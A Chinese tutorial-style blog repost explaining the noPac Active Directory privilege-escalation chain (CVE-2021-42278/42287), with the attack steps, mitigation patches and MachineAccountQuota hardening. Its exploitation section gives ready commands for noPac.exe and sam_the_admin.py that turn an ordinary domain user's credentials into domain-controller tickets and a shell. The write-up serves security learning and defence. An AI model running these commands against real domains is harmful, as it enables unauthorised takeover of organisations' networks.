nopac域提权

这篇具有很好参考价值的文章主要介绍了nopac域提权。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一.前言

2021年11月9日,微软Windows Active Directory 域服务权限提升漏洞,漏洞利用细节和工具被公开,漏洞编号CVE-2021-42287,CVE-2021-42278。可导致攻击者将域内普通用户提升至管理员权限等危害。该漏洞是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升漏洞。

影响版本
windows server 2008/2012/2016/2019/2022等多个版本

二.漏洞概述

CVE-2021-42278
机器账户的名字应该以$结尾,即sAMAccountName属性,但ADCS没对机器账户名进行验证,导致存在绕过。配合CVE-2021-42287漏洞可以模拟域控制器机器账户,接管域控。该组合漏洞也可称作sAMAccountName spoofing
CVE-2021-42287
使用TGT申请ST时,当kdc未找到TGT对应的账户名时,KDC会再次在目录自动搜索,并搜索结尾的机器账户。如果创建与DC机器账户名字相同的机器账户(不以结尾),账户请求一个TGT后,更名账户,然后通过约束委派协议S4U2self申请TGS Ticket。接着DC在TGS_REP阶段,这个账户不存在的时候,DC会使用自己的密钥加密TGS Ticket,提供一个属于该账户的PAC,然后我们就得到具有域控权限的st。

说白了就是:如果获得了 DC 用户的 TGT 票据且域内有一台名为 DC$ 域控,再将 DC 用户删除,此时使用该 TGT 去请求 s4u2self,如果域控制器帐户 DC$ 存在,那么 DC 就能获得域控制器帐户(机器用户DC$)的 ST 票证。

攻击流程:
1.使用普通域用户创建机器账户,并清除该机器账户的spn。默认普通域用户可以创建10个机器账户,MachineAccountQuota默认为10;
2.将机器账户的sAMAccountName属性改为DC的机器账户名字,注意不包含$符;
3.使用Rubeus为机器账户请求生成TGT;
4.将机器账户的sAMAccountName属性修改为其他名字,不与dc机器名字重复;
5.使用Rubeus工具,通过S4U2self委派协议向DC请求TGS票据,也就是委派给dc去请求kdc发起认证,生成st;
可以使用adsi管理工具查看账户属性:
adsiedit.msc
nopac域提权

三.漏洞利用

使用nopac脚本自动化利用

https://github.com/cube0x0/noPac
工具执行环境:nopac运行需安装 .net 4.0
需要条件:需要一个域普通用户

  • 检测是否存在漏洞
noPac.exe scan -domain redteam.red -user saul -pass 'Red12345'

nopac域提权

  • 利用漏洞申请域管权限的st
    使用域普通用户的TGT,利用漏洞请求TGS申请域控机器账户 cifs服务和ldap服务的ST凭证:
# mAccount参数:重命名后的机器账户
# mPassword参数:重命名后的机器账户密码
noPac.exe -domain redteam.red -user saul -pass 'Red12345' /dc owa.redteam.red /mAccount saulgoodman /mPassword passW0rd /service cifs /ptt
noPac.exe -domain redteam.red -user saul -pass 'Red12345' /dc owa.redteam.red /mAccount saulgoodman /mPassword passW0rd /service ldap /ptt

nopac域提权
nopac域提权
访问域控的文件服务,还可进行dcsync
nopac域提权

使用sam-the-admin脚本自动化利用

https://github.com/WazeHell/sam-the-admin
为避免当前机器缓存的票据对漏洞利用产生影响,先清空机器的凭证

klist purge #清空凭证
 klist

利用漏洞执行命令:
(ps:脚本只能在kali上运行,windows会报错)

python3 sam_the_admin.py "redteam/saul:Red12345" -dc-ip 10.10.10.8 -shell

windows会报错:
nopac域提权
nopac域提权

四.缓解措施

1.微软官方已推出补丁:KB5008602、KB5008380;
2.通过域控的 ADSI 编辑器工具将 AD 域的 MAQ 配置为 0,中断此漏洞的利用链。MachineAccountQuota默认为10,值为0意味着普通用户无法创建机器账户,也就无法直接利用这个漏洞

参考文档

https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html
https://mp.weixin.qq.com/s/urKdoW9SgalZ4UtA2_1SBw
https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
https://mp.weixin.qq.com/s/RvOndF3gdEZbgqrIPqXsUg文章来源地址https://www.toymoban.com/news/detail-400832.html

到了这里,关于nopac域提权的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • OCR - 微软windows 11系统自带的Windows OCR功能初体验

    一、Power Automate简述         最近再了解一些ocr的相关信息,从一些网站上上看到微软的免费系统实用工具套件中包含ocr识别/pdf文本提取等。         什么是Power Automate?        Windows 11 允许用户通过预装的 Power Automate 应用创建自动化。 Power Automate 是一个低代码平台,

    2024年02月05日
    浏览(21)
  • windows11删除微软账户,使用本地账户登录,解除绑定

    进入设置,左侧点击“账户”,选择账户信息,找到账户设置,点击“ 改用本地账户登录 ”或者”停 止自动登录到所有的Microsoft应用 ”等,可能略有不同,但是都是一个效果。 注意,有时候可能没有改用本地账户登录选项,我一开始也没有 改用本地账户登录 选项,就选择

    2024年02月16日
    浏览(35)
  • sudo堆缓冲区溢出提权漏洞(CVE-2021-3156)

    这个漏洞被披露于2021年1月26日。漏洞的载体是我们常用的sudo命令。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通

    2024年02月13日
    浏览(17)
  • windows11,微软账号登录错误码0x80190001

    实测有用 前提:关闭所有梯子 1.在Internet Explorer浏览器的右上角点击设置,打开“Internet选项”。 2.在“Internet选项”界面,进入“常规”,单击“删除”,再点击“确定”,缓存文件就已经全部删除。 3.在“Internet选项”界面,进入“高级”, 单击 “重置”,即可。 按Win

    2024年02月07日
    浏览(18)
  • 微软:今天起加速推广Windows 11,让更多设备免费升级

    由于用户反馈良好, 微软方面表示,从今天开始加速推广 Windows 11,这其实也表明了他们的态度,Win10 已经是过去式了,而 Windows 11 才是他们的重心 。如果用户的系统运行的是Windows 10的2004或更高版本,并且安装了微软于2021年9月14日发布的服务更新,那么现在就可以直接升级

    2024年02月11日
    浏览(27)
  • windows11内置微软copilot国内能用吗?一切来看下!

    微软copilot最初是叫bing chat之后官方宣布改名为“copilot” 中文的意思是副驾驶。其实也不难理解copilot的诞生就是辅助帮助创作提高工作或者学习效率,这个与openAI一起开发的人工智能应用在各个方面依然有着优秀的表现。 很多网友反映虽然升级到最新版的windows 11系统后可以

    2024年02月19日
    浏览(14)
  • Windows 11 Microsoft Store(微软商店)加载不出来,怎么办?

    问题: 方法: Win+R 打开 运行 ,输入 inetcpl.cpl ,确定 在 Intnet属性 中点击 连接 中的 局域网设置 只!!! 勾选 自动检测设置(A) 后确定退出 再次打开 Microsoft Store 就OK了 简单明了解决实际问题,杜绝冗长废话浪费时间!

    2024年02月11日
    浏览(15)
  • Windows 11 再惹“众怒”!网友:微软就是在逼我买新电脑!

    一般来说,不论是移动还是桌面操作系统,如若要升级版本,大多用户都不会产生过大的抵触情绪,毕竟更新往往都是为了确保用户获得最佳体验。但近来用户对微软推出 Windows 11 的态度却是“反其道而行之”。 自 6 月 24 日微软正式官宣 Windows 11 之后,随之而来的不是期待

    2024年02月05日
    浏览(12)
  • 从 Gartner 报告浅析微软 Active Directory 的变迁

    Active Directory(AD)  作为企业身份结构的一部分,多年来一直是绝大多数企业使用的主要目录系统。AD 通常是身份管理的后备数据源,可以帮助企业实现 高效、安全的集中式身份管理 ,在 IAM 领域可谓如鱼得水。对于以本地部署的微软技术为主的企业,AD就是保护企业用户,

    2024年02月08日
    浏览(12)
  • 微软Windows 11正式发布!一文带你了解免费升级方法、最低系统要求

    2.备份用户所有的重要文件、应用程序和数据。 3.在用户的Windows 10电脑上,进入设置更新和安全Windows更新。 4.检查更新。 5.如果有免费的Windows 11升级,用户会看到一个下载和安装的选项。 点击“下载和安装”后,按照屏幕上的提示,配置Windows 11设置。 如果用户没有看到免

    2024年03月26日
    浏览(60)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包